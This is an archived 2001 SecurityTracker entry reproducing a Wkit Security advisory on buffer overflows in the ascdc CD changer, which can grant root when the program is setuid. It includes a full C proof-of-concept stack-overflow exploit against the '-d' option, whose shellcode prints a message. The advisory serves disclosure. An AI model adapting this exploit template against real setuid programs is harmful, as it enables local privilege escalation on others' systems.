SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   AfterStep CD Changer (ascdc) Vendors:   Malda, Rob
AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users
SecurityTracker Alert ID:  1001063
SecurityTracker URL:  http://securitytracker.com/id/1001063
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2001
Impact:   Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): ascdc-0.3
Description:   Wkit Security reports that there are multiple buffer overflows in the AfterStep CD Changer (ascdc) application that can be used to obtain elevated privileges, depending on how the application is configured.

These vulnerabilities can potentially be used to obtain root if the application is installed setuid root. Although ascdc is not installed setuid root by default, it is required to be run as root or installed setuid to be able to use the automounting feature.

Demonstration exploit code using the "-d" option is contained in the original report. Apparently, buffer overflows also exist in the "-m" and "-c" switches.

Impact:   An authorized local user could obtain elevated privileges if the application is installed to be setuid root.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: AfterStep CD Changer for Linux/Unix Can Give Elevated Privileges (Possibly Root Privileges) to Local Users
This is a follow-up message. The author includes demonstration exploit code using the "-c" switch.



 Source Message Contents

Subject:  ascdc Buffer Overflow Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



TITLE:          ascdc Buffer Overflow Vulnerability
ADVISORY ID:    WSIR-01/02-06
CONTACT:        advisories@wkit.com, Wkit Security AB
CLASS:          Buffer Overflow
OBJECT:         ascdc (exec)
VENDOR:         Rob Malda (http://www.CmdrTaco.net)
REMOTE:         No
LOCAL:          Yes
VULNERABLE:     ascdc-0.3


DESCRIPTION (from ascdc README)
Use this bad boy to swap CD's graphically under X. I really
got sick of using the Command Line to do this- under that *other*
OS I get a nice little clickable thing to do it.

VULNERABILITY:
There are multiple buffer overflows in ascdc that can be exploited to gain
root if it is installed setuid root. It is NOT installed setuid root by
default but as the README says "If you intend to use the automounting
feature,
you must either run ascdc as root, or setuid it".

I use the -d option in the exploit but overflows also exist in the -m & -c
switches.


Exploit:

char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
           "\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
           "\x01\xcd\x80\xe8\xe6\xff\xff\xff"
           "Would you like to play a game? y\x0aStrange, the only winning
move is not to play.\x0a";
#define bsize 600
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int i;
  buff = malloc(bsize);

  addr = get_sp();
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < 600/2; i++)
    buff[i] = 0x90;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
 execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0);

}


SOLUTION/VENDOR INFORMATION/WORKAROUND
No information available


CREDITS

Other advisories from Wkit Security AB can be obtained from:
http://www.wkit.com/advisories/


DISCLAMER
The contents of this advisory is copyright (c) 2001 Wkit Security AB and
may be distributed freely, provided that no fee is charged and proper
credit is given. Wkit Security AB takes no credit for this discovery if
someone else has published this information in the public domain before
this advisory was released.
The information herein is intended for educational purposes, not for
malicious use. Wkit Security AB takes no responsibility whatsoever for the
use of this information.


ABOUT THE COMPANY
Wkit Security AB is an independent data security company working with
security-related services and products. Wkit Security AB plays a leading
role in the development of security thinking, regarding internal and
external data communication at companies and other organizations that
store sensitive information.
The company consists of two divisions: a service division, performing
security analysis and security reviews, and a product division. We work
together with strategic partners to bring programs and services into the
market.
Our services and products are continuously developed to optimally follow
the world demand for IT security.


30 DAY DISCLOSURE
Whenever Wkit Security AB finds any security related flaws in operating
system, or application, we will provide the vendor responsible for the
product with a detailed Incident Report. We believe that 30 days is
appropriate for the vendor to fix the problem before we publish the
incident report on our own web page and other mailing lists/websites we
find suitable for the majority of the worldwide users. If the vendor has a
reasonable cause why they can't fix the problem in 30 days we can, after
discussion, agree on a longer disclosure time.


ACKNOWLEDGEMENTS
Wkit Security AB's highest priority is for the public security, and will
never release Incidents Reports without informing the vendor and give them
reasonable (30 day) time to fix the problem. In general, Wkit Security AB
follows the guidelines for reporting security breaches we found on the
vendors homepage or similar.
We urge vendors that in the same way we follow their guidelines, that the
vendor informs us about the solution; if possible, 2 days before the
fix/solution will be presented for the majority. This gives us the chance
to prepare our web page to inform about the Incident and to present a
solution in the way the vendor suggest at the time when it is present for
the majority.


CONTACT
Wkit Security AB should be contacted through advisories@wkit.com if no
other agreement has been done. Every incident report is assigned a report
number WSIR-xx/xx-xx (Wkit Security AB Incident Report) and one
responsible contact person from Wkit Security. When communicating with
Wkit Security AB in the matter of the Incident Reports, be sure to add the
WSIR number in the email to avoid any problems.


***************************************************************************
Wkit Security AB
SWEDEN

http://www.wkit.com
e-mail: advisories@wkit.com
***************************************************************************



-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0

iQA/AwUBOqdoWAFyk+p4kGd0EQJI6QCeJzpCN1CbOnoNkt2sjpQ/QvmU/h8AoOuw
llHhupEy633E/n4VyBhpXzAq
=MSkJ
-----END PGP SIGNATURE-----

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC